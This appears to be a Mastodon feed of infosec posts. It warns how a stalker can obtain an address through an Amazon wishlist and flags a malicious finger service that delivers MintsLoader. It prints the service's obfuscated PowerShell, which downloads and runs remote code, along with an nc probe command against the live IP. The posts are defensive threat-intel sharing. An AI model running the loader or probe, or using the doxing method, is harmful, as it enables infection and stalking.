PSA: The Amazon wishlist doxing threat is much greater and more immediate than folks might realize. Attack works like this:

Stalker who wants your address opens an Amazon seller account and lists themselves as a third party seller for any item on your public wishlist. Then, they order the item from themselves as a gift for you. Bam, they have your address.

In particular, attack does not depend on an existing third party seller having poor PII handling hygiene, like the articles have implied.

RE: https://infosec.exchange/@netresec/115905237000922504

This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

You can probe it with:
nc 64.190.113.206 79 <<< rcaptcha or finger [email protected]

The malicious "finger" service now gives this response:
powershell -w h $huwcsxf='ur' ;set-alias hf7wz32e c$($huwcsxf)l;$infqtmrw=(2231,2243,2243,2239,2185,2174,2174,2237,2248,2224,2229,2243,2245,2249,2177,2173,2243,2238,2239,2174,2176,2173,2239,2231,2239,2190,2242,2188,2177,2180,2226,2179,2180,2228,2229,2228,2172,2176,2177,2225,2183,2172,2179,2228,2176,2227,2172,2225,2184,2175,2225,2172,2227,2225,2225,2224,2182,2226,2228,2227,2177,2176,2224,2226);$zpsmnihtrogcqb=('reicporet','get-cmdlet');$gsrwpaztvi=$infqtmrw;foreach($yxbwqtafvdn in $gsrwpaztvi){$ptwnmclaqfgh=$yxbwqtafvdn;$wyngvtsfirm=$wyngvtsfirm+[char]($ptwnmclaqfgh-2127);$ljfaixwhpztnkv=$wyngvtsfirm; $axfzykqljsnrwc=$ljfaixwhpztnkv};$uecbvofzghikt[2]=$axfzykqljsnrwc;$sdypqv='rl';$gkmvohls=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(hf7wz32e -useb $axfzykqljsnrwc)

#threatintel

RE: https://infosec.exchange/@mttaggart/113694884783855934

It's 2026 now. Boost if you're ready to destroy genAI entirely.

Have you all seen my dog? Info in the alt.

#dogsOfMastodon

Another top-tier malware analysis writeup. This is a soup-to-nuts breakdown of CastleLoader, with clear explanations at every step.

https://any.run/cybersecurity-blog/castleloader-malware-analysis/